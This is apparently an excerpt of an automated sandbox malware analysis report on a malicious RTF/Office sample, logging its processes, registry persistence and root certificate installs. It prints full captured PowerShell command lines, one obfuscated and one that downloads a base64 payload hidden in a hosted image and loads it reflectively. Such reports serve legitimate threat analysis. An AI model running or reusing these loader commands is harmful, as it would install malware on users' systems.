Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: msacm32.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: shcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: bcrypt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: version.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: sxs.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: dwmapi.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: msisip.dll

Source: C:\Windows\SysWOW64\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B54F3741-5B07-11CF-A4B0-00AA004A55E8}\InprocServer32

Jump to behavior

Source: SecuriteInfo.com.Exploit.ShellCode.69.19968.913.LNK.0.dr

LNK file: ..\..\..\..\..\Desktop\SecuriteInfo.com.Exploit.ShellCode.69.19968.913.rtf

Source: C:\Windows\System32\wscript.exe	Automated click: OK
Source: C:\Windows\System32\wscript.exe	Automated click: OK
Source: C:\Windows\System32\wscript.exe	Automated click: OK

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source:	Binary string: H:\New Private Panell Src 3.0 New\New Private Panell Src 3.0 2025\New Private Panell Src 3.0\System.Management.Automation Controle Financeiro Rump fix\obj\Debug\net20\System.Management.Automation.pdb source: powershell.exe, 00000008.00000002.391262548.0000000003DF9000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: H:\New Private Panell Src 3.0 New\New Private Panell Src 3.0 2025\New Private Panell Src 3.0\System.Management.Automation Controle Financeiro Rump fix\obj\Debug\net20\System.Management.Automation.pdbSHA256n source: powershell.exe, 00000008.00000002.391262548.0000000003DF9000.00000004.00000800.00020000.00000000.sdmp

Source: ~WRF{6C8F4896-7948-479F-8EE2-C642D1E95148}.tmp.0.dr

Initial sample: OLE indicators vbamacros = False

Data Obfuscation

Suspicious powershell command line found

Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDcDgTreMwDgTrevDgTreDcDgTreOQDgTre3DgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDMDgTreODgTreDgTre4DgTreDIDgTreMDgTreDgTreyDgTreDkDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDg
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links \| Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029', 'https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.CMR/77662/62.412.012.291//:ptth' , '1' , 'C:\ProgramData\' , 'RMCD','RegAsm',''))} }"
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDcDgTreMwDgTrevDgTreDcDgTreOQDgTre3DgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDMDgTreODgTreDgTre4DgTreDIDgTreMDgTreDgTreyDgTreDkDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDg	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links \| Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029', 'https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.CMR/77662/62.412.012.291//:ptth' , '1' , 'C:\ProgramData\' , 'RMCD','RegAsm',''))} }"	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 11_2_0041CB50 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,

11_2_0041CB50

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_00302DE3 push ebx; ret	8_2_00302DEA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 11_2_00457106 push ecx; ret	11_2_00457119
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 11_2_0045B11A push esp; ret	11_2_0045B141
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 11_2_0045E54D push esi; ret	11_2_0045E556
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 11_2_00457A28 push eax; ret	11_2_00457A46
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 11_2_00434E56 push ecx; ret	11_2_00434E69

Persistence and Installation Behavior

Command shell drops VBS files

Source: C:\Windows\SysWOW64\cmd.exe

File created: C:\ProgramData\RMCD.vbs

Jump to behavior

Installs new ROOT certificates

Source: C:\Windows\SysWOW64\wscript.exe	Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C Blob	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C Blob	Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Code function: 2_2_035C065A URLDownloadToFileW,ShellExecuteW,ExitProcess,

2_2_035C065A

Boot Survival

Creates autostart registry keys with suspicious values (likely registry only malware)

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Path C:\ProgramData\RMCD.vbs

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 11_2_0041AA4A OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,

11_2_0041AA4A

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Path			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Path			Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

11_2_0041CB50

Source: C:\Windows\SysWOW64\wscript.exe

Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
